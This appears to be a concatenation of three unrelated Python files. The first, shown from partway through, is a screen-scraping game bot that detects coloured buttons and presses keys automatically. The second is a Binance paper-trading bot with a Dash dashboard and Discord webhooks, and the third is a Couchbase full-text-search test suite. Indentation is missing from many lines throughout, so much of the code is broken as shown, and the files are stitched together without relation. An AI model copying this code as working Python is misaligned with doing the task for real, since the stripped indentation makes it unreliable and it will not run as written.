ORANGE_HSV_MAX = 20, 255, 255
FAIRY_HSV_MIN = 73, 101, 101
FAIRY_HSV_MAX = 95, 143, 255
RUN_COMBINATION = 'Ctrl+Shift+R'
QUIT_COMBINATION = 'Ctrl+Shift+Q'
AUTO_ATTACK_COMBINATION = 'Space'
BOT_DATA = {
'START': False,
'AUTO_ATTACK': False,
}
def change_start():
BOT_DATA['START'] = not BOT_DATA['START']
log.debug('START: %s', BOT_DATA['START'])
def change_auto_attack():
BOT_DATA['AUTO_ATTACK'] = not BOT_DATA['AUTO_ATTACK']
log.debug('AUTO_ATTACK: %s', BOT_DATA['AUTO_ATTACK'])
log.debug('Press "%s" for RUN / PAUSE', RUN_COMBINATION)
log.debug('Press "%s" for QUIT', QUIT_COMBINATION)
log.debug('Press "%s" for AUTO_ATTACK', AUTO_ATTACK_COMBINATION)
def process_auto_attack():
while True:
if not BOT_DATA['START']:
time.sleep(0.01)
continue
        # Simulate an attack
if BOT_DATA['AUTO_ATTACK']:
pyautogui.typewrite('C')
time.sleep(0.01)
def process_find_fairy(img_hsv):
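    # Detect button- and fairy-coloured contours by HSV range, keep only fairy
    # candidates that have a blue or orange button nearby, then press 'D' for a
    # blue button or 'A' for an orange one.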
rects_blue = find_rect_contours(img_hsv, BLUE_HSV_MIN, BLUE_HSV_MAX)
rects_orange = find_rect_contours(img_hsv, ORANGE_HSV_MIN, ORANGE_HSV_MAX)
rects_fairy = find_rect_contours(img_hsv, FAIRY_HSV_MIN, FAIRY_HSV_MAX)
    # Filter the detected objects
rects_blue = list(filter(filter_button, rects_blue))
rects_orange = list(filter(filter_button, rects_orange))
rects_fairy = list(filter(filter_fairy, rects_fairy))
    # Filter objects that look like the fairy
if rects_blue or rects_orange:
new_rects_fairy = []
        # The fairy and the buttons appear close together, so drop any "fairy" candidates that have no blue or orange button nearby
for rect_fairy in rects_fairy:
found_blue = bool(list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_blue)))
found_orange = bool(list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_orange)))
            # If something was found near the fairy
if found_blue or found_orange:
new_rects_fairy.append(rect_fairy)
rects_fairy = new_rects_fairy
if not rects_fairy:
return
if len(rects_fairy) > 1:
save_screenshot('many_fairy', img_hsv)
return
    # Filter the buttons: keep only those next to the fairy
rect_fairy = rects_fairy[0]
rects_blue = list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_blue))
rects_orange = list(filter(lambda rect: filter_fairy_and_button(rect_fairy, rect), rects_orange))
    # If both buttons are present at the same time
if rects_blue and rects_orange:
save_screenshot('many_buttons', img_hsv)
return
if not rects_blue and not rects_orange:
return
    # Blue button found
    if rects_blue:
        log.debug('FOUND BLUE')
        save_screenshot('found_blue', img_hsv)
pyautogui.typewrite('D')
    # Orange button found
    if rects_orange:
        log.debug('FOUND ORANGE')
        save_screenshot('found_orange', img_hsv)
pyautogui.typewrite('A')
if __name__ == '__main__':
    keyboard.add_hotkey(QUIT_COMBINATION, lambda: log.debug('Quit by %s', QUIT_COMBINATION) or os._exit(0))
keyboard.add_hotkey(AUTO_ATTACK_COMBINATION, change_auto_attack)
keyboard.add_hotkey(RUN_COMBINATION, change_start)
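    # The hotkeys above only toggle flags in BOT_DATA; the auto-attack thread and
    # the main loop below poll those flags.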
    # Start the auto-attack thread
thread_auto_attack = threading.Thread(target=process_auto_attack)
thread_auto_attack.start()
while True:
if not BOT_DATA['START']:
time.sleep(0.01)
continue
t = timer()
try:
img_screenshot = pyautogui.screenshot()
log.debug('img_screenshot: %s', img_screenshot)
img = cv2.cvtColor(np.array(img_screenshot), cv2.COLOR_RGB2HSV)
            # Look for the fairy
process_find_fairy(img)
            # TODO: add automatic use of healing potions and mana restoration
finally:
log.debug(f'Elapsed: {timer() - t} secs')
time.sleep(0.01)
|
live.py
|
#standard libraries
import time
from datetime import datetime
import csv
import os
import json
from concurrent import futures
import threading
import multiprocessing
import math
#external libraries
import numpy as np
import pandas as pd
from discord import Webhook, RequestsWebhookAdapter
from binance.client import Client
from binance.enums import *
from matplotlib import pyplot as plt
#dash imports
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
import plotly.express as px
import plotly.graph_objects as go
#file imports
from database import LiveDataBase
from actor import NNActor
from utils import read_json, read_config, timer
class Gui():
def __init__(self, hook):
#data setup
self.hook = hook
#app setup
self.app = dash.Dash(__name__)
title = html.Div(id="title", children=[html.H1(f"Trading {self.hook.ldb.symbol}, on the {self.hook.ldb.market_endpoint} market")])
profit = html.Div(id="profit")
live_graph = html.Div(id="live-graph-wrapper")
interval = dcc.Interval(id='interval', interval=1*1000, n_intervals=0)
self.app.layout = html.Div(children=[title, profit, live_graph, interval])
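        # The Interval component fires every second (interval=1000 ms) and drives the
        # two callbacks below, which refresh the live graph and the profit header.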
@self.app.callback(Output('live-graph-wrapper', 'children'),
Input('interval', 'n_intervals'))
def update_live_graph(n):
#get the data
data = self.hook.actionlog.get_data_frame(self.hook.ldb.data.iloc[:-1,:])
#create the figure
fig = go.Figure()
fig.add_trace(go.Scatter(x=data["close_time"], y=data["close"], mode="lines", name="close price", line=dict(color="black")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["hold"], mode="markers", name="hold", line=dict(color="gray")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["buy"], mode="markers", name="buy", line=dict(color="green")))
fig.add_trace(go.Scatter(x=data["close_time"], y=data["sell"], mode="markers", name="sell", line=dict(color="red")))
return dcc.Graph(id="live-graph", figure=fig)
@self.app.callback(Output('profit', 'children'),
Input('interval', 'n_intervals'))
def update_profit(n):
#get the specific profit
specific_profit = self.hook.broker.specific_profit
return html.H2(f"Specific Profit since start: {specific_profit}")
def run(self):
self.app.run_server(host="0.0.0.0", debug=False, dev_tools_silence_routes_logging=True)
class ActionLog():
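    # Fixed-size rolling log of the bot's decisions; np.nan marks steps without an
    # action. Action codes match get_data_frame below: 0 = hold, 1 = buy, 2 = sell.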
def __init__(self, size=200):
self.size = size
#action memory
self.action = [np.nan]*self.size
#actual price memory
self.actual_price = [np.nan]*self.size
def append(self, action, actual_price):
#save the action
if action is None:
self.action.append(np.nan)
elif action == 0 or action == 1 or action == 2:
self.action.append(action)
else:
raise Exception(f"Your chosen action {action} is not valid!")
#save the actual price
if actual_price is None:
self.actual_price.append(np.nan)
else:
self.actual_price.append(actual_price)
#cut the first elements off
self.action.pop(0)
self.actual_price.pop(0)
def get_data_frame(self, df):
data = df[["close_time", "close"]].copy()
#set the length
length = data.shape[0]
if length > self.size:
length = self.size
#shorten the data
data = data.iloc[-length:,:]
#add the actions
data["action"] = np.array(self.action[-length:])
#add the action prices
data["hold"] = np.nan
data.loc[data["action"] == 0, "hold"] = data.loc[data["action"] == 0, "close"]
data["buy"] = np.nan
data.loc[data["action"] == 1, "buy"] = data.loc[data["action"] == 1, "close"]
data["sell"] = np.nan
data.loc[data["action"] == 2, "sell"] = data.loc[data["action"] == 2, "close"]
#add the actual prices
data["actual_price"] = np.array(self.actual_price[-length:])
#reset the index
data.reset_index(inplace=True, drop=True)
return data
class Broker():
def __init__(self, symbol, testing=True, config_path=None):
        #save/create necessary variables
self.symbol = symbol
self.testing = testing
self.profit = 0
self.specific_profit = 0
self.mode = "buy"
#load in the config
self.config = read_config(path=config_path)
#create the client
self.client = Client(api_key=self.config["binance"]["key"], api_secret=self.config["binance"]["secret"])
"""
Testnet:
self.client = Client(api_key=self.config["binance"]["key_testnet"], api_secret=self.config["binance"]["secret_testnet"])
self.client.API_URL = "https://testnet.binance.vision/api"
order = self.client.create_order(symbol="ETHUSDT", side=SIDE_SELL, type=ORDER_TYPE_MARKET, quantity=2)
print(order)
print(self.client.get_asset_balance(asset="ETH"))
print(self.client.get_asset_balance(asset="USDT"))
"""
def _get_current_price(self):
market_endpoint = self.config["binance"]["market_endpoint"]
if market_endpoint == "spot":
price_dict = self.client.get_symbol_ticker(symbol=self.symbol)
price = price_dict["price"]
elif market_endpoint == "futures":
price_dict = self.client.futures_symbol_ticker(symbol=self.symbol)
price = price_dict["price"]
else:
raise Exception(f"Your chosen market endpoint: {market_endpoint} is not available, change in config.json")
print(price)
return float(price)
    def buy(self, amount):
        if self.testing:
            return self._test_buy(amount=amount)
        raise Exception("Real buying has not been implemented yet")
def _test_buy(self, amount):
if self.mode == "buy":
#get the current price
price = self._get_current_price()
#set as buyprice
self.buy_price = price
self.mode = "sell"
else:
return
def sell(self):
if self.testing:
return self._test_sell()
raise Exception("Real selling has not been implemented yet")
def _test_sell(self):
if self.mode == "sell":
#get the current price
price = self._get_current_price()
#calculate profit
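            # (1 - 0.00075)**2 applies what is presumably a 0.075% trading fee once on
            # the buy leg and once on the sell leg of the round trip.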
specific_profit = price/self.buy_price * (1-0.00075)**2 - 1
#add to specific profit count
self.specific_profit += specific_profit
self.mode = "buy"
else:
return
def trade(self, action, amount):
if action == 0:
return
elif action == 1:
self.buy(amount=amount)
elif action == 2:
self.sell()
else:
raise Exception(f"Your chosen action: {action} is not valid")
class Bot():
def __init__(self, symbol, run_path, actor, config_path=None):
#save the variables
self.symbol = symbol
self.run_path = run_path
self.info_path = self.run_path + "/info.json"
self.config_path = config_path
#config dictionary
self.config = read_config(path=config_path)
#info dictionary
self.info = read_json(path=self.info_path)
#setup the ldb
self.ldb = LiveDataBase(symbol=self.symbol, run_path=self.run_path, config_path=self.config_path)
#save the actor
self.actor = actor
#setup the actionlog
self.actionlog = ActionLog(size=100)
#setup the broker
self.broker = Broker(symbol=self.symbol, testing=True)
#setup the gui
self.gui = Gui(hook=self)
def update(self):
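        # One update cycle: refresh the live database, derive the current state, ask
        # the actor for an action, hand it to the broker and log it. If the data
        # update fails, the database is rebuilt and no action is taken this step.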
start = time.time()
#setup discord webhooks
webhook = Webhook.partial(self.config["discord"]["webhook_id"], self.config["discord"]["webhook_token"], adapter=RequestsWebhookAdapter())
prec_webhook = Webhook.partial(self.config["discord"]["prec_webhook_id"], self.config["discord"]["prec_webhook_token"], adapter=RequestsWebhookAdapter())
#update our ldb
try:
self.ldb.update_data()
except Exception as e:
print("Unsuccesfull ldb update resetting and conducting no action!")
print("Exception: ", e)
#reset our database
self.ldb = LiveDataBase(symbol=self.symbol, run_path=self.run_path, config_path=self.config_path)
#save no action
self.actionlog.append(action=None, actual_price=None)
#end the update method
return
#get the new state
state = self.ldb.get_state()
#get the action for that new state
action = self.actor.get_action(state)
#do something with this action
self.broker.trade(action=action, amount=1000)
#save the action
self.actionlog.append(action=action, actual_price=100)
#calculate update duration
duration = time.time()-start
print(f"Update took {round(duration,2)} seconds")
def run(self):
#startup the gui
gui_thread = threading.Thread(target=self.gui.run)
gui_thread.start()
#main loop
while True:
#wait for time to get to candlestick_interval
timer(candlestick_interval=self.info["candlestick_interval"])
#wait a little time
time.sleep(2)
#update the coins
self.update()
gui_thread.join()
if __name__ == "__main__":
from pretrain import Network
#load in the actor
Actor = NNActor(neural_network=Network, load_path="./experiments/testeth2/Run1", epoch=0)
bot = Bot(symbol="ETHUSDT", run_path="./experiments/testeth2/Run1", actor=Actor)
bot.run()
|
stable_topology_fts.py
|
# coding=utf-8
import copy
import json
import random
from threading import Thread
import Geohash
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputSingleton
from fts_base import FTSBaseTest
from lib.membase.api.exception import FTSException, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
class StableTopFTS(FTSBaseTest):
def setUp(self):
super(StableTopFTS, self).setUp()
def tearDown(self):
super(StableTopFTS, self).tearDown()
def check_fts_service_started(self):
try:
rest = RestConnection(self._cb_cluster.get_random_fts_node())
rest.get_fts_index_definition("invalid_index")
except ServerUnavailableException as e:
raise FTSException("FTS service has not started: %s" %e)
def create_simple_default_index(self):
plan_params = self.construct_plan_params()
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items/2)
self.create_fts_indexes_all_buckets(plan_params=plan_params)
if self._update or self._delete:
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
def test_index_docvalues_option(self):
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
        if float(self.get_zap_docvalue_disksize()) != float(0):
            self.fail("zap docvalue disk size is not zero even though docValues = False")
        else:
            self.log.info("zap docvalue disk size found to be: {0}".format(self.get_zap_docvalue_disksize()))
index.update_docvalues_email_custom_index(True)
self.wait_for_indexing_complete()
        if float(self.get_zap_docvalue_disksize()) == float(0):
            self.fail("zap docvalue disk size is zero even though docValues = True")
        else:
            self.log.info("zap docvalue disk size found to be: {0}".format(self.get_zap_docvalue_disksize()))
def test_maxttl_setting(self):
self.create_simple_default_index()
maxttl = int(self._input.param("maxttl", None))
self.sleep(maxttl,
"Waiting for expiration at the elapse of bucket maxttl")
self._cb_cluster.run_expiry_pager()
self.wait_for_indexing_complete(item_count=0)
self.validate_index_count(must_equal=0)
for index in self._cb_cluster.get_indexes():
query = eval(self._input.param("query", str(self.sample_query)))
hits, _, _, _ = index.execute_query(query,
zero_results_ok=True,
expected_hits=0)
self.log.info("Hits: %s" % hits)
def query_in_dgm(self):
self.create_simple_default_index()
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def run_default_index_query(self, query=None, expected_hits=None, expected_no_of_results=None):
self.create_simple_default_index()
zero_results_ok = True
if not expected_hits:
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
if not query:
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
if expected_no_of_results is None:
expected_no_of_results = self._input.param("expected_no_of_results", None)
for index in self._cb_cluster.get_indexes():
hits, matches, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
expected_no_of_results=expected_no_of_results)
self.log.info("Hits: %s" % hits)
self.log.info("Matches: %s" % matches)
def test_query_type(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_type_on_alias(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
alias = self.create_alias([index])
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias)
def test_match_all(self):
self.run_default_index_query(query={"match_all": {}},
expected_hits=self._num_items)
def test_match_none(self):
self.run_default_index_query(query={"match_none": {}},
expected_hits=0)
def test_match_consistency(self):
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors
)
self.log.info("Hits: %s" % hits)
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
self.async_perform_update_delete(self.upd_del_fields)
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_error(self):
query = {"match_all": {}}
fts_node = self._cb_cluster.get_random_fts_node()
service_map = RestConnection(self._cb_cluster.get_master_node()).get_nodes_services()
# select FTS node to shutdown
for node_ip, services in service_map.iteritems():
ip = node_ip.split(':')[0]
node = self._cb_cluster.get_node(ip, node_ip.split(':')[1])
if node and 'fts' in services and 'kv' not in services:
fts_node = node
break
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
try:
from fts_base import NodeHelper
NodeHelper.stop_couchbase(fts_node)
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
self.async_perform_update_delete(self.upd_del_fields)
finally:
NodeHelper.start_couchbase(fts_node)
NodeHelper.wait_service_started(fts_node)
self.sleep(10)
# "status":"remote consistency error" => expected_hits=-1
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=-1,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
ClusterOperationHelper.wait_for_ns_servers_or_assert([fts_node], self, wait_if_warmup=True)
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_long_timeout(self):
timeout = self._input.param("timeout", None)
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
tasks = []
for i in xrange(self.consistency_vectors.values()[0].values()[0]):
tasks.append(Thread(target=self.async_perform_update_delete, args=(self.upd_del_fields,)))
for task in tasks:
task.start()
num_items = self._num_items
if timeout is None or timeout <= 60000:
# Here we assume that the update takes more than 60 seconds
# when we use timeout <= 60 sec we get timeout error
# with None we have 60s by default
num_items = 0
try:
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors,
timeout=timeout)
finally:
for task in tasks:
task.join()
self.log.info("Hits: %s" % hits)
def index_utf16_dataset(self):
self.load_utf16_data()
try:
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
# an exception will most likely be thrown from waiting
self.wait_for_indexing_complete()
self.validate_index_count(
equal_bucket_doc_count=False,
zero_rows_ok=True,
must_equal=0)
except Exception as e:
raise FTSException("Exception thrown in utf-16 test :{0}".format(e))
def create_simple_alias(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
alias = self.create_alias([index])
hits2, _, _, _ = alias.execute_query(self.sample_query,
zero_results_ok=False)
if hits != hits2:
self.fail("Index query yields {0} hits while alias on same index "
"yields only {1} hits".format(hits, hits2))
return index, alias
def create_query_alias_on_multiple_indexes(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
# create "emp" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="emp",
num_replicas=0)
emp = self._cb_cluster.get_bucket_by_name('emp')
# create "wiki" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="wiki",
num_replicas=0)
wiki = self._cb_cluster.get_bucket_by_name('wiki')
#load emp dataset into emp bucket
emp_gen = self.get_generator(dataset="emp", num_items=self._num_items)
wiki_gen = self.get_generator(dataset="wiki", num_items=self._num_items)
if self.es:
# make deep copies of the generators
import copy
emp_gen_copy = copy.deepcopy(emp_gen)
wiki_gen_copy = copy.deepcopy(wiki_gen)
load_tasks = self._cb_cluster.async_load_bucket_from_generator(
bucket=emp,
kv_gen=emp_gen)
load_tasks += self._cb_cluster.async_load_bucket_from_generator(
bucket=wiki,
kv_gen=wiki_gen)
if self.es:
# create empty ES indexes
self.es.create_empty_index("emp_es_index")
self.es.create_empty_index("wiki_es_index")
load_tasks.append(self.es.async_bulk_load_ES(index_name='emp_es_index',
gen=emp_gen_copy,
op_type='create'))
load_tasks.append(self.es.async_bulk_load_ES(index_name='wiki_es_index',
gen=wiki_gen_copy,
op_type='create'))
for task in load_tasks:
task.result()
# create indexes on both buckets
emp_index = self.create_index(emp, "emp_index")
wiki_index = self.create_index(wiki, "wiki_index")
self.wait_for_indexing_complete()
# create compound alias
alias = self.create_alias(target_indexes=[emp_index, wiki_index],
name="emp_wiki_alias")
if self.es:
self.es.create_alias(name="emp_wiki_es_alias",
indexes=["emp_es_index", "wiki_es_index"])
# run rqg on the alias
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias, es_index_name="emp_wiki_es_alias")
def index_wiki(self):
self.load_wiki(lang=self.lang)
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "wiki_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
def delete_index_then_query(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_fts_index(index.name)
try:
hits2, _, _, _ = index.execute_query(self.sample_query)
except Exception as e:
# expected, pass test
self.log.info("Expected exception: {0}".format(e))
def drop_bucket_check_index(self):
count = 0
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_bucket("default")
self.sleep(20, "waiting for bucket deletion to be known by fts")
try:
count = index.get_indexed_doc_count()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
# at this point, index has been deleted,
# remove index from list of indexes
self._cb_cluster.get_indexes().remove(index)
if count:
self.fail("Able to retrieve index json from index "
"built on bucket that was deleted")
def delete_index_having_alias(self):
index, alias = self.create_simple_alias()
self._cb_cluster.delete_fts_index(index.name)
hits, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits))
if hits >= 0:
self.fail("Query alias with deleted target returns query results!")
def delete_index_having_alias_recreate_index_query(self):
index, alias = self.create_simple_alias()
hits1, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits1))
index.delete()
self.log.info("Recreating deleted index ...")
bucket = self._cb_cluster.get_bucket_by_name('default')
self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
hits2, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits2))
if hits1 != hits2:
self.fail("Hits from alias before index recreation: %s,"
" after recreation: %s" %(hits1, hits2))
def create_alias_on_deleted_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
from fts_base import INDEX_DEFAULTS
alias_def = INDEX_DEFAULTS.ALIAS_DEFINITION
alias_def['targets'][index.name] = {}
alias_def['targets'][index.name]['indexUUID'] = index.get_uuid()
index.delete()
try:
self.create_alias([index], alias_def)
self.fail("Was able to create alias on deleted target")
except Exception as e:
self.log.info("Expected exception :{0}".format(e))
def edit_index_new_name(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
index.name = "new_index"
try:
index.update()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
def edit_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
#hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
def update_index_during_large_indexing(self):
"""
MB-22410 - Updating index with a large dirty write queue
items = some millions defined at run_time using items param
"""
rest = RestConnection(self._cb_cluster.get_random_fts_node())
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items/2)
status, stat_value = rest.get_fts_stats(index_name=index.name,
bucket_name=bucket.name,
stat_name='num_recs_to_persist')
self.log.info("Data(metadata + docs) in write queue is {0}".
format(stat_value))
new_plan_param = self.construct_plan_params()
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10, "Wait for index to get updated...")
self.is_index_partitioned_balanced(index=index)
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
# see if the index is still query-able with all data
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
self.log.info("Hits: %s" % hits)
def delete_index_during_large_indexing(self):
"""
MB-22410 - Deleting index with a large dirty write queue is slow
items = 5M
"""
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items/2)
index.delete()
self.sleep(5)
try:
_, defn = index.get_index_defn()
self.log.info(defn)
self.fail("ERROR: Index definition still exists after deletion! "
"%s" %defn['indexDef'])
except Exception as e:
self.log.info("Expected exception caught: %s" % e)
def edit_index_negative(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
# update params with plan params values to check for validation
index.index_definition['params'] = \
index.build_custom_index_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as e:
self.log.info("Expected exception: %s" % e)
def index_query_beer_sample(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
self.load_sample_buckets(server=master, bucketName="beer-sample")
bucket = self._cb_cluster.get_bucket_by_name("beer-sample")
index = self.create_index(bucket, "beer-index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
query = {"match": "cafe", "field": "name"}
hits, _, _, _ = index.execute_query(query,
zero_results_ok=False,
expected_hits=10)
self.log.info("Hits: %s" % hits)
def index_query_custom_mapping(self):
"""
uses RQG for custom mapping
"""
# create a custom map, disable default map
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
if self.es:
self.create_es_index_mapping(index.es_custom_map,
index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_string_combinations(self):
"""
uses RQG framework minus randomness for testing query-string combinations of '', '+', '-'
{
mterms := [
[], // none
["+Wikipedia"], // one term
["+Wikipedia", "+English"], // two terms
["+the"], // one term (stop word)
["+the", "+English"], // two terms (one stop)
["+the", "+and"], // two terms (both stop)
]
sterms = [
[], // none
["Category"], // one term
["Category", "United"], // two terms
["of"], // one term (stop word)
["of", "United"], // two terms (one stop)
["of", "at"], // two terms (both stop)
]
nterms = [
[], // none
["-language"], // one term
["-language", "-States"], // two terms
["-for"], // one term (stop word)
["-for", "-States"], // two terms (one stop)
["-for", "-with"], // two terms (both stop)
]
}
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.fts_queries = []
mterms = [[],
["+revision.text.#text:\"Wikipedia\""],
["+revision.text.#text:\"Wikipedia\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"and\""]]
sterms = [[],
["revision.text.#text:\"Category\""],
["revision.text.#text:\"Category\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"at\""]]
nterms = [[],
["-revision.text.#text:\"language\""],
["-revision.text.#text:\"language\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"with\""]]
for mterm in mterms:
for sterm in sterms:
for nterm in nterms:
clause = (' '.join(mterm) + ' ' + ' '.join(sterm) + ' ' + ' '.join(nterm)).strip()
query = {"query": clause}
index.fts_queries.append(json.loads(json.dumps(query,ensure_ascii=False)))
if self.compare_es:
self.es.es_queries.append(json.loads(json.dumps({"query": {"query_string": query}},
ensure_ascii=False)))
self.run_query_and_compare(index)
def index_edit_and_query_custom_mapping(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map,index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
self.log.error(err)
fail = True
